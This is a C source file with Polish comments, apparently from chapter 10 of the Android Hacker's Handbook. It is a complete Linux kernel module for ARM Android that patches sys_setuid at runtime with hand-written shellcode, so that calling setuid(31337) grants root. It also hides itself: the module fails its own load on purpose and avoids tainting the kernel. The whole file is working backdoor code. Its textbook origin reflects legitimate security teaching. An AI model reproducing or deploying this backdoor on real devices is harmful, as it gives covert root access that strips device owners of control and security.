/*
 * Android Hacker's Handbook
 * Rozdzial 10
 *
 * Ten modul wstawia tylne wejscie do funkcji sys_setuid w dzialajacym jadrze 
 *
 * dev:kernel $ make ARCH=arm CONFIG_AHH_SETUID=m M=drivers/ahh_setuid
 *
 * NOTE: Ten modul moze nie zadzialac w jadrach MSM gdzie fragmenty z kodem jadra sa tylko do odczytu.
 */
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kallsyms.h>
#include <asm/cacheflush.h>

/*
 * Wywolujemy to po wykonaniu kilku pierwszych instrukcji.
 * Jesli ktos wywola setuid(31337), dostanie pelne uprawnienia.
 */
unsigned long backdoor_code[] = {
    /*
     * if (uid == 31337)
     */
    0xe92d4040,  /* stmfd sp!, {r6,lr}       */
    0xe59f6034,  /* ldr r6, [pc,#52]         */
    0xe1500006,  /* cmp r0, r6               */
    0x1a000006,  /* bne <go_back> */
    /*
     *     return commit_creds(prepare_kernel_cred(0));
     */
    0xe3a00000,  /* mov r0, #0               */
    0xe59f6028,  /* ldr r6, [pc,#40]         */
    0xe12fff36,  /* blx r6                   */
    0xe59f6024,  /* ldr r6, [pc,#36]         */
    0xe12fff36,  /* blx r6                   */
    /*
     * Nie chcemy wykonywac dalszej czesci zwyklej funkcji setuid.
     * Wyczysc stos i wroc do miejsca wywolania...
     */
    0xe8bd8040,  /* ldm sp, {r6,pc}          */

    /* nie wykonywane! */
    0,           /* nop */

/* powrot: */
    0xe8bd4040,  /* ldm sp!, {r6,lr}         */
    /* tutaj oryginalne instrukcje */
#define ORIG_OFF 12
    0xf0f00020,
    0xf0f00020,
    0xf0f00020,
    /* przekierowanie do miejsca poczatkowego */
    0xe59ff008,  /* ldr pc, [pc,#8]          */
/* backdoor_uid: */
    0x7a69,      /* backdoor uid 31337 */
    0xf0f00030,  /* adres prepare_kernel_cred */
    0xf0f00040,  /* adres commit_creds */
    0xf0f00010,  /* adres powrotu */
};


unsigned long ahh_find_symbol(char *name)
{
    unsigned long ret;

    ret = (unsigned long)kallsyms_lookup_name(name);
    if (ret)
        printk(KERN_INFO "%s: znalezione %s @ 0x%lx\n", __this_module.name, name, ret);
    else
        printk(KERN_INFO "%s: nie znalezione %s!\n", __this_module.name, name);
    return ret;
}


int init_module(void)
{
    unsigned long *p_setuid, *p_kernel_init;
    unsigned long commit_creds, prepare_kernel_cred;
    unsigned long p_ret;
    int i, already_installed = 0;

    if (!(p_setuid = (unsigned long *)ahh_find_symbol("sys_setuid")))
        return -1;
    if (!(p_kernel_init = (unsigned long *)ahh_find_symbol("kernel_init")))
        return -1;

    if (!(commit_creds = ahh_find_symbol("commit_creds")))
        return -1;
    if (!(prepare_kernel_cred = ahh_find_symbol("prepare_kernel_cred")))
        return -1;

    /* instaluj poczatek tylko jesli jeszcze nie zostal zainstalowany */
    if (p_setuid[0] == 0xe59ff000
        && p_setuid[1] == (unsigned long)p_kernel_init) {
        printk(KERN_INFO "%s: juz byl zainstalowany! Tylko aktualizuje kod backdoora.\n", __this_module.name);
        already_installed = 1;
    }

    /* modyfikacja kernel_init by dodac nasz kod */
    memcpy(p_kernel_init, backdoor_code, sizeof(backdoor_code));

    /* skopiuj oryginalne instrukcje jesli nie zostaly jeszcze nadpisane */
    if (!already_installed) {
        for (i = 0; i < 3; i++)
            p_kernel_init[i + ORIG_OFF] = p_setuid[i];
    }

    /* umiesc funkcje cred */
    p_kernel_init[ORIG_OFF + 5] = prepare_kernel_cred;
    p_kernel_init[ORIG_OFF + 6] = commit_creds;

    /* umiesc miejsce powrotu */
    p_ret = (unsigned long)(p_setuid + 3);
    printk(KERN_INFO "%s: wraca do 0x%lx\n", __this_module.name, p_ret);
    p_kernel_init[ORIG_OFF + 7] = p_ret;

    /* przekierowuje p_setuid do kodu naszego backdoora jesli jeszcze nie zostalo to zrobione */
    if (!already_installed) {
        p_setuid[0] = 0xe59ff000;  /* ldr pc, [pc,#0] */
        p_setuid[1] = p_setuid[2] = (unsigned long)p_kernel_init;
        printk(KERN_INFO "%s: installed hook!\n", __this_module.name);
    }

    /* oproznienie bufora instrukcji =) */
    __flush_icache_all();
    flush_cache_all();

    /* zglos blad aby nie pozostawic zaladowanego modulu */
    return -1;
}


void cleanup_module(void)
{
    /* nic */
}


MODULE_LICENSE("GPL v2"); /* nie oznacz jadra (taint)! */
MODULE_AUTHOR("Android Hackers");
MODULE_DESCRIPTION("sys_setuid backdoor");
MODULE_VERSION("1.0");

